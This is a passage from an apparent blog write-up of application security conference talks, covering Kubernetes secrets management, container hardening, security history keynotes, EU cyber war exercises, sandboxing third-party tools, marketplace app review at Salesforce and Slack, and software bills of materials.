The pod itself is considered out of scope for this talk, as there are a number of orthogonal concerns and security requirements (e.g. Who can “SSH” in? What is running on the pod? Does the code leak the secrets?)

Option #1: Kubermetes Secrets

At first, Kubernetes Secrets seemed like a quick, easy win. However, secrets are base64 encoded, which is called out in the risks section in the documentation.

If you configure the secret through a manifest (JSON or YAML) file which has the secret data encoded as base64, sharing this file or checking it in to a source repository means the secret is compromised. Base64 encoding is not an encryption method and is considered the same as plain text.

There are some other solutions, like helm-secrets and sealed-secrets, but using them has some key management challenges, you become coupled to a specific cluster/deployment method, and any change to the secret requires decryption.

Consuming can be done via environment variables, which has tradeoffs, or volume mounts or configuration files.

Kubernetes Secrets: The Environment Variable Debate

Option #2: Hashicorp Vault

Vault has a number of nice properties, but it requires a separate storage of secrets and deployment files (everything isn’t in a single git repo, so no single source of truth), requires an external permission model, and you have to manage the deployment and running of the service. There are some cloud vendor alternatives, such as AWS Secrets Manager, Azure Key Vault, and GCP berglas.

Option #3: Roll Your Own (Kamus)

Omer took inspiration from how Travis supports encrypted secrets, where users can include encrypted values in their travis.yml files that can only be read by Travis CI.

So, Omer and his colleagues built Kamus, which is basically Travis secret encryption for Kubernetes.

Demo

Omer gives a demo of using Kamus at 19:52, and you can also follow along with a Kalmus example in their GitHub repo.

Kamus Security

Kamus has the following permission model:

Encrypt Decrypt
User Yes (can be limited) No
Pod Yes Only its own secrets

Protections

User: secure by default permission model and CLI (enforces HTTPS, has support for certificate pinning).

Git: strong encryption using Azure KeyVault/GCP KMS (supports HSM protection and IP filtering, the latter of which makes it tough to exfiltrate secrets even in the case of a successful attack), one-way encryption.

Pod: secure by default permission model, in-memory volume for decrypted files.

Kamus API: Separate pods (crypto component is never exposed to the Internet), the encryptor supports authentication (if you want to limit who can speak to it), and every commit is scanned by Checkmarx (SAST), ZAP (DAST), and Snyk (out of date dependencies).

Accepted Risks

  • Clear text traffic inside the cluster (in practice it’s very hard to man-in-the-middle Kubernetes traffic in the cloud)
  • Any pod in the same namespace can mount any service account (Pod impersonation)
  • Service account token never expires

References

Kamus is also discussed in this blog post, and you can find the source code here.

How to Lose a Container in 10 Minutes

Sarah Young, Azure Security Architect, Microsoft
abstract slides video

In this talk, Sarah discusses container and Kubernetes best practices, insecure defaults to watch out for, and what happens when you do everything wrong and make your container or cluster publicly available on the Internet.

Moving to the Cloud? Tidy House

If you’re making the move to the cloud and containerizing your application, use this as a opportunity to tidy it up.

  • Everything should be encrypted at rest and in transit.
  • Use TLS 1.2 or 1.3.
  • Remove deprecated protocols.
  • Tidy up the code and simplify where possible.

Use Only Trusted Base Images

Make sure you know where your container images come from.

Try to minimize your use of images from the Internet by keeping your own base images.

You can use a private image repository, such as those from cloud providers (GCP Container Registry, Azure Container Registry, AWS Elastic Container Registry), GitLab container registry, or even run a private DockerHub registry (see also Notary).

Kubernetes’ Insecure Defaults

Kubernetes default configurations generally are fairly insecure, and you need to work through the orchestrator configs to secure them.

Especially dangerous Kubernetes defaults include the API server listening on port 8080 (unauth) and “secrets management” using etcd.

The CIS Kubernetes benchmark has some good advice for securing Kubernetes defaults.

Secrets Management

Rather than baking credentials and secrets into containers, instead pass them in as environment variables.

Kubernetes stores secrets in etcd, encoded in base64. D’oh. Instead, use the built-in secrets management functionality provided by major cloud platforms, such as AWS Secrets Manager, Azure Key Vault, and GCP berglas. If those don’t work for your use cases, you could also use a third-party secrets management system like Vault.

Rotate your secrets regularly, at least once a month if you can. Talk with your risk team to determine what makes sense.

See Can Kubernetes Keep a Secret? for more thoughts on storing secrets in Kubernetes and the tradeoffs on passing in secrets via environment variables.

Container Privilege Best Practices

#1 thing: Don’t run as root.

If you must run as root (e.g. your container needs to modify the host system), use runtime security tools to limit what is accessible. Check out Aqua Enforcer, SELinux, AppArmor and seccomp profiles.

Orchestrator Privilege Best Practices

As mentioned previously, Kubernetes had (and still has) some insecure defaults, including:

  • Anonymous user access isn’t disabled.
  • The dashboard had full admin privileges by default (prior to v1.7).
  • No RBAC before v1.8.

If you don’t have the internal expertise to manage Kubernetes, there’s no shame in using one of the managed offerings cloud platforms provide.

There are also some open source tools to declaratively manage Kubernetes clusters, such as kube-aws.

Ensure Your Tools Work on Containers / Kubernetes

When you move to the cloud and/or are containerizing applications, don’t assume your same tools will work. They might not.

Most security tools need to be specifically container/k8s aware, or may need additional plugins. Review the following areas: IDS/heuristics, vulnerability scanning, your SIEM, runtime security, and auditing.

The same goes for your CI/CD pipeline - the tools you’re using may need to altered to work properly or replaced entirely.

Benchmark your tools with both developers and the security team. After all, a tool that doesn’t work for devs won’t get used.

Experiment: What Happens When You Do Everything Wrong?

Sarah spent a few months spinning up containers and Kubernetes clusters and leaving them open to the Internet. She intentionally disabled many built-in security features and overally did the inverse of everything she advocated doing in this talk.

She ran the containers on a cloud hosting provider so it wasn’t on her own infrastructure, and she paid through PayPal so she could avoid running up a big bill. The base containers she used were for Wordpress and Ubuntu 14.04.

Surprisingly, they were not compromised as quickly as she expected, and the overall level of attacks were less than you’d think. One potential reason for this is that the cloud hosting provider may be offering other protections transparently behind the scenes.

Resources



Keynotes

Fail, Learn, Fix

Bryan Payne, Director of Engineering, Product & Application Security, Netflix
abstract slides video

History: Lessons from Electrical Work

Bryan did some electrical work over Christmas break and he was impressed that you could buy various parts made from different companies, put them together, and it was overall safe and straightforward.

How did they get to that place?

It wasn’t always this way. In the 1880s, it was a Wild West and people were getting electrocuted. But then a standards body was created that wrote a document, “National Electrical Code,” containing thoses standards as well as best practices. This caused deaths from electrocution to trend down over time.

This is a general practice in engineering - examine failures, which may result from technical issues or people, and then spread that knowledge, so that the industry as a whole can learn and get better.

Fail, Learn, Fix in Computing

Bryan gives an example of the Therac-25, a software-controlled radio therapy machine.

The Therac-25 had a software bug that ended up killing several people. Unlike prior machines, it didn’t have hardware protections that would blow a fuse and fail safely if parameters went outside of expected bounds.

The Therac-25 had a number of major flaws:

  • Lack of documentation
  • Insufficient testing
  • Cryptic / frequent error messages
  • Complicated software programmed in assembly
  • Custom real time OS
  • No fault tolerance / redundancy
  • Systemic failures - no hardware safeguards for software faults

Learnings included:

  • Test properly and thoroughly
  • Software quality and assurance must be a design priority from the beginning
  • Safety and quality are system attributes, not code attributes
  • Interface usability is important
  • Safety critical systems should be created by qualified personnel

A few years ago, someone wrote a retrospective on what had happened (The Therac-25: 30 years Later), and covered topics like: how has the industry evolved? Are we doing better?

The long and short of it is - not really.

But because of the Therac-25, a law was passed that allowed the FDA to do a mandatory recall of devices, and stats had to be aggregated for device failures.

Fail, Learn, Fix in Security

Software security started in government with the rainbow books, which were a set of guidelines for how you could evaluate the security of a system.

Fail, Learn, Fix: Rainbow Books

…security is expensive to set up and a nuisance to run… While we await a catastrophe, simpler setup is the most important step toward better security.

From Butler Lampson’s 2005 USENIX Security Keynote Address, Computer Securityin the Real World.

This is still true today.

When Bryan rates how the security industry is doing currently, he gives it an A+ for Failing, C for Learning, and F for Fixing.

Paths to Success

Companies do retrospectives sometimes, but it’s all internal. We need to have detailed broader retrospectives on security issues with our peers. We’re not learning as much as we could be.

To Bryan, the biggest thing we need to do is not come up with some fancy new technical solution, but rather to talk, digging into the security problems we’re seeing together. What are the common themes? How do we start to move all of this forward together? As we do this, we can start to identify patterns.

Currently security patterns are sort of like the sewing industry - you can buy one from one company and it’s totally different from what you’d get somewhere else.

We need to think about how we can advance these patterns in a way that helps the whole industry. If there are problems in the patterns, then we fix them and the whole industry gets better, not just the one company.

Munawar Hafiz has a Security Pattern Catalog page that lists many patterns, and Microsoft has some nice ones on their Azure site as well.

If we want to make an actual difference, we need to find a way to package these patterns and make them easy for devs to adopt.

At Netflix, they have a config file where devs can simply set the following, which will have the application automatically use a strong, modern TLS configuration when communicating with other services.

ENDPOINT_SECURITY=enabled

Here’s how we can learn better:

  • Align on how we talk about our systems and our failures
  • Share lessons across the industry
  • Identify trends
  • Connect trends to risk/impact

Here’s how we can fix better:

  • Have security experts agree on proper patterns for fixing problems
  • Create real world implementations of the patterns
  • Ensure that it is trivial to use the implementations correctly
  • Integrate security into the computing ecosystem

Security Success Stories

Bryan calls out several security successes that are headed in the right direction.

Service to service auth has historically been different at every company, but SPIFFE offers a common to handle service identity.

Software auto-updating, in browsers for example, has been a huge win. We should do this everywhere.

The percentage of Alexa 1M sites using HTTPS passed 50% in 2018, which is fantastic.

Let’s work on securing the whole system, not just a little slice of it. And let’s secure it in a way that works for everyone.

The way that we get there is by figuring out how we fail together, how we learn together, and ultimately how we fix the problems together.

Questions

Can you give a specific example of a failure Netflix had?

One AppSec engineer spent 6 - 9 months working on operationalizing an automated vulnerability scanner that never ended up finding a vulnerability.

The AppSec team learned that they didn’t have great scoping when they went into the project- their goals weren’t well aligned with reality.

Now the AppSec team focuses their efforts not on vulnerability identification but other areas in AppSec that are easier to solve.

They also learned that they need a set of objectives and success criteria to determine if they’re spending their time well way earlier in the process.

This would have allowed them to pull the plug 3 weeks in when they realized it wouldn’t work, rather than after 6 months.

Should we standardize on certain configurations (e.g. TLS)? This might make it easier to update and deploy those updates everywhere across orgs, bringing everyone to the same security bar.

Bryan avoided saying “standards” in the presentation because people bristle at it. Standards are hard, but probably the direction we need. Standards are why networking works, but we’ve moved away from standards as we’ve gone up the stack, e.g. cloud services.

How to Slay a Dragon

Adrienne Porter Felt, Chrome Engineer & Manager, Google
abstract slides video

Adrienne has been on the Chrome security team for 6 years and focuses on usable security.

In this talk, she describes three ways to tackle fundamentally hard problems, using challenges the Chrome security team has faced as illustrative examples.

Hard Problems in the Real World

There may be some cases where there’s a clear path forward to solve a security problem with no tradeoffs. But in Adrienne’s experience, security is usually a tradeoff between security and something else that you need to make work at the same time.

For example, you can force people to regularly rotate their password. This helps if their credentials have been compromised, but you’ll have to deal with people forgetting their password, writing it down, and/or creating weak or easily guessed passwords.

Often, there is no right choice when it comes to security decisions - there are only imperfect solutions. You have to weigh hard to quantify risks with easier to quantify costs.

Regardless of the tradeoff you decide to make, you’re going to make some people unhappy.

Security is the art of making tradeoffs.

A dragon is a problem with imperfect solutions.

How to Slay a Dragon

When faced with an “impossible” problem that will have tradeoffs either way:

  1. Fight its little cousin instead
    • Find the more easily solvable variants of this problem.
    • You can do this over and over again to chip away at the sub parts of the problem that feel tractable.
  2. Accept imperfection and criticism
    • You’re going to have to accept that after you solve the little subproblems, eventually you’ll still have to make a hard call.
    • And people will criticize you for the tradeoffs you’ve chosen to make progress.
  3. Pay off your debt over time
    • Reducing the cost that decision may have made.

She talks about 3 examples of this process.

Site Isolation

“Site isolation” is having one process for each origin. Adopting this model required changing many assumptions throughout the Chrome source.

The core tradeoff here is security vs memory.

After Spectre and Meltdown, the Chrome security team decided that the security benefit was worth it.

#1 Fight its little cousin instead

They made a massive dependency diagram of all the blockers, things they’d have to refactor, things that could cause performance challenges.

Rather than determining how to isolate everything off the bat, they first tackled iframes and extensions.

#2 Accept imperfection and criticism

After pulling off this incredibly feat of engineering that had the security community excited, there were a number of tech outlets that complained about how Chrome now used more memory.

How to Slay a Dragon: Site Isolation
You can’t please everyone. Site isolation requires a fundamental security vs memory usage tradeoff

Chrome Security Indicators

The Chrome security team wanted to be able to indicate to users when their communications with a site were secure (over HTTPS).

They did a number of user studies and found that conveying this context to non technical users is fundamentally hard. They tried a number of icons, but it was tough to convey that HTTP wasn’t secure when the majority of websites at the time did not use TLS. If Chrome had adopted a red icon for HTTP sites on day one, this would have scared users - they would have thought the whole web was insecure, or perhaps that browsing in Chrome was insecure.

They decided that it was easier to get the Internet to move to HTTPs than to teach people the difference between HTTP and HTTPS. They partnered with Firefox and Let’s Encrypt to help get big, popular sites to use HTTPS.

After HTTPS adoption was higher, they could label HTTP as “not secure” instead of HTTPS as “secure.”

Displaying URLs

How do we help people understand web identity?

End users generally don’t know how to validate domain URLs. In a user study, 2/3 of people presented with a Google login page on various TinyURL URLs said they would enter their credentials, even though they were told this was a study where there might be phishing.

On the other hand, technical users like the way URLs work now. If Google were to change the URL display to help convey to non technical users website identity, technical users may find it harder to get the info they want from it.

Formatting and displaying URLs is fundamentally hard: punycode, small window sizes (e.g. mobile) make you choose what to display.

Conclusion

Security is the art of managing risks and tradeoffs.

You’re often in a position where you want to build a new system or you want to make something better, but making it better doesn’t necessarily mean that you’re going to make everything better, it often means you’re going to have to balance the security risks with other types of usability costs or other types of product costs.

But nevertheless,

Dragons are worth slaying.

Impossible problems are tractable a bite at a time.

The Unabridged History of Application Security

Jim Manico, Founder, Manicode Security
abstract slides video

Jim gives a fun and engaging history of computer security, with an overall encouraging message:

Things are getting a lot better, and we should be proud of what we’ve done.

InfoSec started in October 1967, with a task force formed by ARPA (Advanced Research Projects Agency). The Rand Report R-609 (Security Controls for Computer Systems) then determined additional steps that should be taken to improve security, which was declassified in 1975.

History of AppSec: Security Testing
Firesheep played a critical role in getting popular web apps (e.g. Facebook, Twitter, GMail) to adopt TLS on more than just the login page.

Look at all we’ve accomplished as a community.

History of AppSec: OWASP Projects
ZAP and Dependency Checker have been incredibly valuable in pushing the security industry forward. If you’re going to sell a product, it better at least be better than these open source tools.

For better and for worse, people point to us for advice as a community.

Jim aptly points out the importance of OWASP: the security industry, and the tech industry more broadly, relies on the recommendations of OWASP for what good security should look like, best practices to adopt, and more.

We have an obligation to take this trust seriously, and behave accordingly, with thoughtfulness and responsibility.

History of AppSec: XSS

Jim references a talk that describes how strict-dynamic can make rolling out CSP much easier, which I believe is the 2017 AppSec EU talk Making CSP great again! by Google Information Security Engineers Michele Spagnuolo and Lukas Weichselbaum (slides, video).

I found some other related info on this blog post: The new way of doing CSP takes the pain away.

History of AppSec: AppSec
History of AppSec: Future
Some humorous and some aspirational predictions about the future of security.



Misc

How to Start a Cyber War: Lessons from Brussels-EU Cyber Warfare Exercises

Christina Kubecka, CEO, HypaSec
abstract slides video

Chris describes her experiences running a workshop in Brussels with diplomats from various EU countries in which they collectively worked through a number of cyberwarfare-type scenarios.

This talk was a fascinating discussion of the interactions between technology, computer security, economics, and geopolitics.

Cyber War Scenarios

Scenarios discussed included:

  • A leak from an embassy staff family member
  • A breach from an intelligence agency mixed with a splash of extortion & tool leakage
  • Attacks against critical infrastructure across the EU and NATO members causing mass casualties

I highly recommend listening to these scenarios. They’re interesting, realistic, and demonstrate how intertwined technology, politics, and intra/international economies are. In security, we often focus on only the technical aspects. This talk is a great wake-up call to the broader implications of our field.

Elements of these scenarios are based on a combination of events that have actually happened as well as incidents that could feasibly occur.

For each scenario, attendees had to make tough decisions on how to respond. Should what occurred be considered “cyber warfare”? Should their country respond by doing nothing, rebuking the events, recalling or dismissing their diplomats from the responsible country, declare solidarity with the victims, hack back, declare war, deploy nukes, some combination of these, something else?

Cyber War: Warm-up Exercises
Cyber War: Dead Canary

How It Worked

Teams were switched between each scenario and given a different team advisor.

One thing that scared Chris was that there was no scenario in which everyone was able to come to a unanimous consensus. When attendees were broken up into smaller teams, though, they generally could come to a consensus.

The key takeaway was the importance of preparation. Many of the attending member states hadn’t done much preparation for these types of scenarios and hadn’t thought through what domino effect could occur.

For example, attacks on gas infrastructure could cause gas shortages, which if severe enough, could lead to police or ambulances not being able to respond to emergencies when needed.

Now when I last visited NATO headquarters in Brussels, I warned them, that if they didn’t get their defense spending up to 2% of their GDP…

Now is the time for Europe to stand on its own two feet. American blood will not be spilled.

AI in Warfare

Many countries are investing heavily in machine learning and AI, which will likely have huge impacts on warfare in the future.

Image/facial recognition, natural language processing, sentiment analysis, and other areas all have military applications.

We may see a future in which algorithms created by algorithms are deciding between life and death.

Conclusions

These types of scenarios are already occurring. They have happened, and will happen again in the future.

Many times dealing with these types of events takes friends. Do you know who your friends are? One of the problmes in the EU right now is they’re unsure.

Making assumptions that other people will take care of security doesn’t work.

Assumptions are starting to kill people now.

Questions

The Q&A section was really interesting. Here are a few of the parts that stuck out to me.

Do you think cyber war in a conflict would be different than the low grade cyber war that happens every day?

Yes, in the way it would be executed, among other things.

About 6 months before any Russian boots were seen in the Crimean region, a researcher out of Ukraine found that a bunch of smart TV systems were being controlled by someone else, and channels were being switched to pro-Russian propaganda stations. They were trying to build support of Russia and specifically targeted the Crimean population.

On international jurisdiction

One challenge is that many EU nations disagree about jurisdiction during investigations or events that cross borders. Sometimes when you want to go after someone you can’t, which is a huge problem.

The EU actually leans heavily on the FBI to come out for major events.

The FBI assists with evidence collection, sorting out jurisdiction issues, helps with attorneys, puts pressure to try to extradite people, and is effective at getting proof/evidence from various countries. The FBI has significant valuable expertise.

The U.S. government shutdown has caused a problem for other countries, in that U.S. government agencies haven’t been able to help as they otherwise would.

How much of a problem will Brexit be?

A huge problem. Brexit is taking away the biggest military from the EU. If they also leave the Five Eyes, this will cause other member nations to lose valuable intelligence info.

We’re already seeing these effects now - they couldn’t come to an agreement on a border in Ireland so last week there was a car bomb.



Securing Third-Party Code

Behind the Scenes: Securing In-House Execution of Unsafe Third-Party Executables

Mukul Khullar, Staff Security Engineer, LinkedIn
abstract slides video

Many companies rely on third-party native executables for functionality like image and video processing. However, many of these tools are written in C or C++ and were not designed with security in mind. When a malicious user uploads a specially crafted file, it can lead to arbitrary command execution via a buffer overflow or command injection, arbitrary file read or write, and other bad outcomes.

Mukul recommends a three step defense-in-depth process for mitigating these risks.

1. Profile the executable

Do your homework:

  • What’s the security history of the code base? Any systemic issue classes? Do they fuzz it regularly?
  • Audit it for dangerous functionality - is there any unnecessary functionality you can disable?
  • Threat model the app’s attack surface - understand how data flows through it as well as its storage and networking requirements.

Profile the executable and determine the system calls it requires:

  • Install the latest version in a VM and run its test suite or run it with the specific commands you’ll be using in producting, using known good data.
  • Observe the system calls it makes using a tool like strace and then build a seccomp-bpf profile that blocks any syscall beyond the set required to minimize the kernel attack surface exposed to the tool.

Here there be dragons
As one of the audience questions pointed out, and based on my personal experience, this is easier said than done: creating the policies is hard (making sure you exercise all of the functionality you’ll require is nontrivial), and in some cases the tool may require a number of dangerous syscalls, like execve.

2. Harden the application layer

We also want to make the application itself as resistant to attack as possible.

Magic byte analysis: parse the initial few bytes of input file and match it against a known set of file signatures. This can be massively complex in practice, as file formats may be complex or polymorphic, with other file types nested inside.

Input validation - the canonical “security thing you should do,” but still applies here.

Is there some expected structure or input restrictions you can apply immediately and reject inputs that don’t fulfill them? For example, a field may be a number, so restrict the input to 0-9.

3. Secure the processing pipeline (harden your infrastructure, use secure network design)

Leverage sandboxing:

  • Run the tool as an unprivileged user in an ephemeral container (to limit persistence).
  • Restrict the app’s capabilities as much as possible by doing syscall filtering, drop privileges before running it, and using Linux namespaces and filesystem jails (like chroot). Google’s light-weight process isolation tool nsjail can also be useful.

Implement a secure network design: so that even if a compromise happens, the attacker has limited ability to pivot and access other systems.

Secure Network Design
Example secure network design
Execution Flow
Example process from end to end

Securing Third Party Applications at Scale

Ryan Flood, Manager of ProdSec, Salesforce
Prashanth Kannan, Product Security Engineer, Salesforce
abstract slides video

This talk describes each step of a methodology to secure third-party apps in general, and then how they do it at Salesforce. A nice combination of both principles and implementation.

If you don’t get the process right, the technical stuff goes to waste.

Background

The Salesforce AppExchange was launched in 2005 as a way for developers to create new functionality that extends and customizes Salesforce and sell these enhancements to Salesforce customers, like the Google Play store. Apps are written in their custom language, Apex.

There are a number of core challenges in third-party applications, including:

  • It’s someone else’s code that you don’t have access to
  • You can only test the end product, not evaluate the process (do they have a robust SDLC?)
  • Apps will change after you’ve reviewed it and add new features
  • They may integrate with other systems that you have no visibility into

One of the most important things is defining the problem. Unless you have an end goal in mind, unless you know what is in and out of scope, a lot of your work is going to go waste.

Build Your Process
Salesforce’s App Review Process

1. Define the problem

  • Who are the third parties this process is supposed to help (vendors, partners, app developers, customers)?
  • What data and other access do they need?
    • Where possible implement restrictions in technical controls rather than policy controls.

Salesforce has built technical controls into the languages app developers use (Apex, Visual Force, Lightning, Lightning web components) and the Salesforce API, keeping apps from breaking out of the sandbox they’re placed in.

Salesforce has an install warning for apps they haven’t reviewed so that customers don’t think the apps have been vetted and place an undue amount of trust in them.

2: Establish baselines

Ensure that the third parties at least considered security: they have some security policy documents, a vulnerability disclosure policy, a security@ email address. Do they have a bug bounty or certs (e.g. ISO 27000/1, SOC 2, PCI)?

Once you decide the “bar to entry” for your marketplace, enforce it across all new apps/partners.

Put your requirement checklist out very publicly; talk about what you expect and why. You can sell this as a way to make the process more scalable and fast for business customers. This will saves you significant communication time.

Salesforce has a gamified learning platform called Trailhead, which can be used to learn about the product. The security team created security-relevant content to put there as well as in the overall Salesforce docs. The security team brings the info they want customers to know wherever they are already.

AppExchange Security Review
Includes a requirements checklist and walk-through wizard

3. Assess

Now measure these partners against your security bar:

  • Security assessments: Ask if they can share any reports from pen tests they’ve received.
  • Security tools: Share the open source and commercial tools your company likes, and encourage the partners to scan themselves.
    • As you build automated scanning for your own use in scanning partner code and API endpoints, consider allowing the partners to leverage your tooling as well in a self-service manner.
  • Security Terms of Service or Contract Terms - Give yourself a way to hold partners accountable for fixing identified bugs and establish terms for what happens to developers who act in bad faith.

4. Remediation

How companies respond to issues you identify will reveal a lot about their commitment to security: the questions they ask, how fast they resolve issues, how good their fixes are, what they push back on, etc.

Offer support to help them pass the process, after all, this is making customers more secure.

At Salesforce, they:

  • Report findings with sufficient context and evidence of the vulnerability and include links to more information, based on industry best practice like OWASP.
  • Create disincentives to prevent “brute forcing” the process, for example, longer wait times.

Figure out what’s important to them and tie that to their security posture.

5. Monitor the Ecosystem

Have a single inventory of your third parties indexed on an important business asset that won’t get lost (e.g. vendor contracts, software licenses, API/OAuth credentials).

Track risk and impact related information, such as:

  • Usage metrics for an app and who’s using it (e.g. an app may be only used by a certain industry or type of user)
  • Prior security reviews - how have they done over time?
  • Any automated security information you can get

Salesforce has used this data to influence their product roadmap. For example, if they see that certain vulnerability classes are common or certain APIs tend to be misused, they’ll add additional security controls, documentation, or change how things work to try to make the ecosystem as a whole more secure.

Data-driven Product Security Improvements
This is a pretty neat application of metrics and worth reflecting on if your company has a popular API or supports third-party addons or plugins.

6. Security Check-ups

Periodically you’ll need to re-evaluate approved applications. This can be done after a certain amount of time, after a certain amount of code or API change, or based on the monetary impact of the partner on your business. Decide on a risk-based approach that makes sense for your company.

Check-ups also allow new security/policy measures to be applied to existing apps.

Note: Security is relative to your current environment; as new attack classes or vulnerabilities appear (e.g. HTTP desync attacks, new attacks on TLS), it’s important to re-evaluate.

The Salesforce AppExchange re-reviews apps based on time and impact and they run automated scans when apps are updated. New Salesforce platform launches can trigger checkups as well.

Good to Great

How to improve your review process over time.

Data Analysis on Review information

Data from past reviews of third-party apps is really helpful, for example:

  • Maybe your security team’s workload spikes at a certain time of year. You can prepare the security team’s schedule for it or hire contractors.
  • Time to review and types/number of vulnerabilities gives insights like: tech stack X tends to have these vulns while language Y tends to other vuln classes. Use this info to train your security engineers.

Label which apps and API endpoints have already been assessed to prevent duplicated work.

Evangelize and educate

Publish your security guidelines internally and externally, evangelize the process and educate the parties involved. Be very clear and consistent with your policy.

Educate your users on how to secure their applications to pass your process

  • Document good and bad examples for topics specific to your business domain
  • Rely on industry standards like OWASP whenever possible

Have security office hours where your customers can schedule time where you help them verify their architecture choices, address false positives, etc.

Automate to Scale

In the beginning, much of your process will be manual, which is OK. Gradually build automation over time into a unified system that includes metrics reporting and operational support.

Have app devs run the security tools your company uses on their app before they engage with you. This gives them earlier feedback so they can address issues before they even get to you, saving both of you time.

Create an Operations Team

They can be the liaison between third party app devs and your security engineering team.

  • This keeps app devs happy with fast responses from a dedicated team.
  • This is cost effective, as apps that are missing items to start the review process are caught before they take expensive security engineer time.
  • Faster time to resolution: nailing the basics with an operations team means less back-and-forth with third parties
Third Party App Provider, Operations, and Security Engineering

Tools to Kickstart Your process

Slack App Security: Securing your Workspaces from a Bot Uprising

Kelly Ann, Security Engineer, Slack
Nikki Brandt, Staff Security Engineer, Slack
abstract slides video

Kelly and Nikki discuss the fundamental challenges in securing Slack apps and the App Directory, the steps Slack is taking now, and what Slack is planning to do in the future.

Real Talk
One thing I appreciated about this talk is that Kelly and Nikki kept it real. Most blog posts, talks, other externally facing communications by companies who run marketplaces of third-party apps tend to frame things like, “Oh yeah, our marketplace is totally 110% secure, nothing bad could ever happen here.”

Of course it can! Random developers from around the world who you don’t know are writing code that extends your platform. Some of the developers could be malicious. Even the most advanced static and dynamic tooling in the world can’t with 100% accuracy identify all malicious applications, so unless you’ve solved the Halting Problem, there could be malicious apps you haven’t detected.

Kelly and Nikki are upfront about the security measures Slack is taking to secure the App Directory and the fundamental challenges in doing so. I find this openness admirable at it’s an approach I’d love to see more companies take.

Slack Apps and the App Directory

The Slack App Directory is a marketplace for users to download Slack “apps” that extend Slack’s functionality in some way, often by integrating third-party services like Dropbox, GitHub, and Jira, to create a central place where work can be done (i.e. Slack), rather than forcing people to use many disparate applications.

Slack doesn’t charge for Slack apps “and never plans to,” so they have no incentive to let poor quality apps in. Many Slack apps are the result of a partnership between Slack and third-party developers.

Currently humans review every Slack app (more details later), but subsequent versions are not re-reviewed unless their OAuth scopes (i.e. permissions) change.

The Slack App Directory vs. other similar marketplaces:

  • Mobile stores (e.g. Google Play, iOS App Store) - similar in that it’s third-party code, but Google and Apple are receiving the app’s code, the code lives on user devices, they vet new versions of apps, and they have significantly more analysis automation in place (big companies with the time and budget to do so).
  • Browser extensions (e.g. Chrome and Firefox extensions) - similar in that the creator can change a Slack app or browser extension at any time without it being vetted. Extensions tend to be more single purpose or have isolated functionality, while Slack apps often tie into an external web application or service that can present a much larger attack surface.

So to reiterate, Slack faces a number of challenges in securing Slack apps:

  • They don’t get a copy of the source code.
  • They have no ability to see version changes unless OAuth scopes change.
  • Apps are typically backed by large, complex web apps that again, Slack has no visibility into.

Who owns the risk for Slack apps?

Technically, legally, the risk belongs to the creators of the third-party apps and the users who choose to install the apps in their workplace. but Slack feels like they own they risk and have an obligation to keep their users safe.

Securing Slack Apps: Now

Apps are installed in test workspaces and undergo the following tests:

  • Scopes are checked to ensure they follow the principle of least privilege - do the requested scopes make sense given the purpose of the app?
  • The app is scanned with two internal automated tools that look for low hanging fruit like a weak TLS configuration.
  • A small set of apps, those with the riskiest set of scopes, are manually pen tested by the Slack product security team or third-party pen testers.

Why isn’t this enough?

  • Slack apps are generally backed by web apps, so just because the Slack app itself appears safe doens’t mean the service is overall safe for users.
  • Slack apps change over time.
  • There are a number of security tests that are challenging to perform automatically, for example, many apps have different installation flows.
  • Slack’s ProdSec team is small and this is just one of many of their responsibilities.

Securing Slack Apps: Future Options

There are a number of other things Slack could do in the future, but none of them are perfect.

Pentesting: There are too many apps for the ProdSec team to pentest themselves, but they could pay a third-party to.

  • Who pays for it? This could be cost prohibitive for a small dev shop and isn’t cheap for Slack either.
  • Pentests give you a point in time view, and Slack apps can change at any time.
  • Should just the Slack app or also the backing web app be in scope?

Certifications: Which ones would be appropriate to require or use? In the speaker’s opinion (and mine), certs often don’t really mean anything. Certs are also point in time, how and when would apps get recertified? Certs cacn also be quite costly.

Hosting Slack Apps: Slack themselves could host Slack apps, which would give them visibility into when apps are updated and what action sthey’re performing. However, this would require a fair amount of infrastructure overhead cost Slack would have to take on and running untrusted code in Slack’s environment introduces additional risk.

Compliance-focused vendor review: Slack’s risk and compliance team already vets vendors they use by asking them questions about their security posture. Slack could leverage this team and process for Slack app developers. But what questions should they ask, and wouldn’t they just be taking developers at their word (i.e. not confirm actual security controls and posture)?

Bug bounty: If the company behind a Slack app already has a bug bounty program, they could include their app in scope, or Slack could include apps in their bug bounty’s scope. There’s some precedent for the latter, as Google Play has a program on Hacker One for certain popular apps.

Combined risk score: By borrowing parts from each of the prior ideas, each Slack app could be given an aggregate risk score. There are some UX challenges here, how can the risk score be made understandable and accessible to less security-saavy users? If users see an app is rated “C+,” will they be scared off from using the app? This could negatively impact the creators of some Slack apps, but perhaps this would encourage better practices and be a net win. Could having a risk score especially impact small dev shops?

Q&A

Slack is in the process of building some automated tooling to detect when an app starts doing something unexpected, like making many API calls that are exfiltrating data. Slack is also working on finer-grained scopes.

Slack has an internal kill switch for apps - if an app is misbehaving, they can quickly disable all existing tokens for it.

Slack is pretty aggressive about delisting apps - if an app isn’t working properly or they reach out to an app’s listed point of contact and they don’t respond relatively quickly, Slack will temporarily disable the app.

Slack has an evolving risk score used internally, and one of the inputs is the app’s requested scopes. Some scopes automatically jump an app right to the top of the risk scoring, for example, the admin scope, which enables an app to do anything an org admin can do.



Security Tooling

BoMs Away - Why Everyone Should Have a BoM

Steve Springett, Senior Security Architect, ServiceNow
abstract slides video source code

In this talk, Steve describes the various use cases of a software bill-of-materials (BOM), including facilitating accurate vulnerability and other supply-chain risk analysis, and gives a demo of OWASP Dependency-Track, an open source supply chain component analysis platform.

A software bill-of-materials (BOM) is the software equivalent of a nutrition label on food: it tells you what’s inside, so you can make an informed decision. This is a relatively new area of focus in the security and tech industry in general, but it is quite important, as it helps facilitate accurate vulnerability and other supply-chain risk analysis.

Steve is the creator of OWASP Dependency-Track, an open source supply chain component analysis platform, a contributor to OWASP Dependency-Check, and is involved in a number of other software transparency-related projects and working groups, so he knows the space quite well.

There a number of factors contributing to the increased emphasis on BOMs, including:

  • Compliance
  • Regulation - The FDA is going to start requiring medical devices to have a cybersecurity BOM, including info on used commercial and open source software as well as hardware.
  • Economic / supply-chain management, market forces - Companies may want to use fewer and better suppliers, BOMs are sometimes required during procurement.

An interesting anecdote Steve mentioned is that in some cases, a vendor not being able to provide a BOM has lead the purchasing company to demand a 20%-30% discount, as they’ll need to take on this operational cost of determining the software’s BOM and it indicates a lack of SDLC maturity, and thus increased risk.

MITRE has published a 56 page document about supply chain security: Deliver Uncompromised: A Strategy for Supply Chain Security and Resilience in Response to the Changing Character of War.

What’s a BOM good for?

BOMs have a number of common use cases, including:

  • License identification and compliance
  • Outdated component analysis
